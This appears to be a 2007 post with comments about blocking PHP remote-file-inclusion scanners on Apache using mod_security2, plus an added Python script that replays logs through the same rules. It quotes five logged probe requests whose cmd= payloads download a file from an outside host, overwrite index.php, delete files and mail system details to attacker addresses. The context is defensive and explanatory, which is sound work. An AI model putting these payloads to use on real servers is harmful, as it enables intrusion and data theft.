There has to be a way to hook Apache to catch the first of these and then drop requests from that client for some time period. modsecurity looks like a valid approach. Anyone actually use it?

1) /Mambo/index2.php?_REQUEST[option]=com_content &_REQUEST[Itemid]=1 &GLOBALS= &mosConfig_absolute_path=http://89.161.233.220.exetel.com.au/webmail/.cache? &cmd=cd+cache;curl -O http://89.161.233.220.exetel.com.au/webmail/.cache;mv cm index.php; rm -rf cm*;uname -a | mail -s 66.150.227.79/Mambo/_uname_i2 +ursu1cc@gmail.com;uname -a | mail -s uname_i2_66.150.227.79 politia112_inactiune@yahoo.com;echo|: 1

2) /cvs/index2.php?_REQUEST[option]=com_content &_REQUEST[Itemid]=1 &GLOBALS= &mosConfig_absolute_path=http://89.161.233.220.exetel.com.au/webmail/.cache? &cmd=cd+cache;curl -O http://89.161.233.220.exetel.com.au/webmail/.cache;mv cm index.php; rm -rf cm*;uname -a | mail -s 66.150.227.79/cvs/_uname_i2 +ursu1cc@gmail.com;uname -a | mail -s uname_i2_66.150.227.79 politia112_inactiune@yahoo.com;echo|: 1

3) /mambo/index2.php?_REQUEST[option]=com_content &_REQUEST[Itemid]=1 &GLOBALS= &mosConfig_absolute_path=http://89.161.233.220.exetel.com.au/webmail/.cache? &cmd=cd+cache;curl -O http://89.161.233.220.exetel.com.au/webmail/.cache;mv cm index.php; rm -rf cm*;uname -a | mail -s 66.150.227.79/mambo/_uname_i2 +ursu1cc@gmail.com;uname -a | mail -s uname_i2_66.150.227.79 politia112_inactiune@yahoo.com;echo|: 1

4) /administrator/components/com_remository/admin.remository.php? mosConfig_absolute_path=http://private.hacker.dj/1?/: 1

5) /phplive/setup/header.php?css_path=http://89.161.233.220.exetel.com.au/webmail/.cache? &cmd=uname -a | mail -s 66.150.227.79/phplive/setup/_uname_phplive+ursu1cc@gmail.com;uname -a | mail -s uname_phplive_66.150.227.79 politia112_inactiune@yahoo.com;echo|: 1

Update 2007-06-02:
I set up modsecurity2 with the following config file and ruleset to reject any scanning bots after the first php request.

LoadModule security2_module /usr/lib/apache2/modules/mod_security2.so

<IfModule mod_security2.c>
SecRuleEngine On

# store session information
SecDataDir /var/cache/apache2/modsecurity

# let everything through, unless explicitly denied
SecDefaultAction "log,pass,phase:2,status:503,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase"

# use the remote host as our session identifier
# (REMOTE_HOST is the client IP address unless Apache has HostnameLookups On)
SecRule REMOTE_HOST "." setsid:%{REMOTE_HOST},nolog

# we don't have any PHP pages, so if someone asks for one, set their session score from 0 (default) to 1
# decrement their score by 1 every 300 seconds, so that they can try back later if they made a mistake.
SecRule REQUEST_BASENAME "\.php$" log,deny,setvar:session.score=1,deprecatevar:session.score=1/300

# if session score is greater than or equal to 1, deny access
# @ge because we may add other SecRules to increment the score
SecRule SESSION:SCORE "@ge 1" "log,deny,msg:'In temporarily banned REMOTE_HOST list'"

# remap our professed software vendor
SecServerSignature "OoO"

# log only warnings, deny, drops
SecAuditEngine RelevantOnly
SecAuditLog "/var/log/apache2/security.log"
</IfModule>
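As an added example (not code from the original post and not part of mod_security itself), the script below replays Apache access-log lines through two checks that mirror the ruleset above: it flags the remote-file-inclusion probe shape seen in the five requests (an include-path parameter such as mosConfig_absolute_path or css_path pointing at a remote URL, plus a cmd= shell payload), and it applies the per-client ban with the same semantics as setvar:session.score=1 and deprecatevar:session.score=1/300. The "combined" log layout, the scanner.invalid hostname and the 10.0.0.x client addresses are assumptions; the sample log is constructed, not taken from the author's server.

```python
# Added example, not code from the original post. Replays Apache "combined"
# access-log lines (assumed layout) through the RFI-probe check and the
# score-based ban that the mod_security config above implements.
import re
from datetime import datetime
from urllib.parse import urlsplit, unquote_plus

# Assumption: Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
APACHE_TIME = "%d/%b/%Y:%H:%M:%S %z"

# Parameters the probes above abuse as include paths; compared lower-cased,
# as the config's default t:lowercase transformation would.
INCLUDE_PARAMS = {"mosconfig_absolute_path", "css_path"}
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def parse_query(query):
    """Split on '&' only: the cmd= payloads contain ';', which
    urllib.parse.parse_qs treats as a separator on older Pythons."""
    pairs = []
    for chunk in query.split("&"):
        if chunk:
            name, _, value = chunk.partition("=")
            pairs.append((unquote_plus(name).strip().lower(), unquote_plus(value)))
    return pairs


def classify(target):
    """Return the RFI indicators found in a request target ({} if none)."""
    findings = {}
    for name, value in parse_query(urlsplit(target).query):
        if name in INCLUDE_PARAMS and REMOTE_URL_RE.match(value.strip()):
            findings["include_url"] = value.strip()
        elif name == "cmd":
            findings["cmd"] = value
    return findings


class BanList:
    """Per-client score: set to 1 on a hit, minus 1 per decay window since the
    last hit, never below 0. A repeated hit restarts the window but does not
    stack, exactly as setvar:session.score=1 (rather than =+1) behaves."""

    def __init__(self, decay_seconds=300):
        self.decay = decay_seconds
        self.last_hit = {}  # client -> timestamp of the last .php request

    def score(self, client, now):
        if client not in self.last_hit:
            return 0
        return max(0, 1 - int((now - self.last_hit[client]) // self.decay))

    def hit(self, client, now):
        self.last_hit[client] = now

    def is_banned(self, client, now):
        return self.score(client, now) >= 1


def replay(lines, banlist=None):
    """Walk log lines in time order; return (client, verdict, findings) per line.
    Rule order matches the config: the .php rule is evaluated before the score
    check, so a banned client that probes .php again refreshes its ban."""
    banlist = banlist or BanList()
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip
        client = m.group("host")
        now = datetime.strptime(m.group("time"), APACHE_TIME).timestamp()
        target = m.group("target")
        findings = classify(target)
        if urlsplit(target).path.lower().endswith(".php"):
            banlist.hit(client, now)
            verdict = "deny:php"
        elif banlist.is_banned(client, now):
            verdict = "deny:banned"
        else:
            verdict = "pass"
        out.append((client, verdict, findings))
    return out


# Constructed sample log (placeholder addresses and hostname): two probes shaped
# like the ones above, the first client returning inside and then outside the
# 300 s window, and an unrelated client.
SAMPLE_LOG = [
    '10.0.0.1 - - [02/Jun/2007:10:00:00 +0000] "GET /mambo/index2.php?_REQUEST[option]=com_content'
    '&GLOBALS=&mosConfig_absolute_path=http://scanner.invalid/.cache?'
    '&cmd=cd+cache;curl+-O+http://scanner.invalid/.cache;uname+-a HTTP/1.0" 503 0',
    '10.0.0.1 - - [02/Jun/2007:10:02:00 +0000] "GET /index.html HTTP/1.0" 503 0',
    '10.0.0.1 - - [02/Jun/2007:10:06:00 +0000] "GET /index.html HTTP/1.0" 200 512',
    '10.0.0.2 - - [02/Jun/2007:10:00:30 +0000] "GET /images/logo.png HTTP/1.1" 200 2048',
    '10.0.0.3 - - [02/Jun/2007:10:01:00 +0000] "GET /phplive/setup/header.php'
    '?css_path=http://scanner.invalid/.cache?&cmd=uname+-a HTTP/1.0" 503 0',
]

if __name__ == "__main__":
    for client, verdict, findings in replay(SAMPLE_LOG):
        print(client, verdict, findings)
```

The indicators that classify() extracts are what a site that must serve PHP would key on instead of the blanket .php rule: the remote-URL shape of an include-path argument, and a cmd= argument at all, are both things a legitimate request to these applications never carries, so a SecRule matching those arguments (ARGS:mosConfig_absolute_path and ARGS:css_path against ^(?:https?|ftp)://) can drive the same session.score ban without rejecting every PHP page.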


We did something with mod_security on a filtro box once. I don't recall which one. It did thwart some attempts but not all of them. You'll likely have to write your own regular expressions to keep up with the script kiddies, as the included ones didn't catch them all -- Nathan
That's handy, but I am not sure many people can get by without having some php running somewhere. Granted, that would be optimal though :) -- Nathan
Well, you can break it down by apache virtual host or Location, so it can get fine-grained. For ease of administration, one should probably stick to one framework per vhost. -- Patrick.
Very nice. I'm reading more about it now per your recommendation. A straight PHP filter probably won't work for me on most sites as I use Wordpress and I'm starting to play with CodeIgniter [php framework]. Still, just detecting attempted break-ins using standard vulnerabilities will be quite useful. -- Calvin.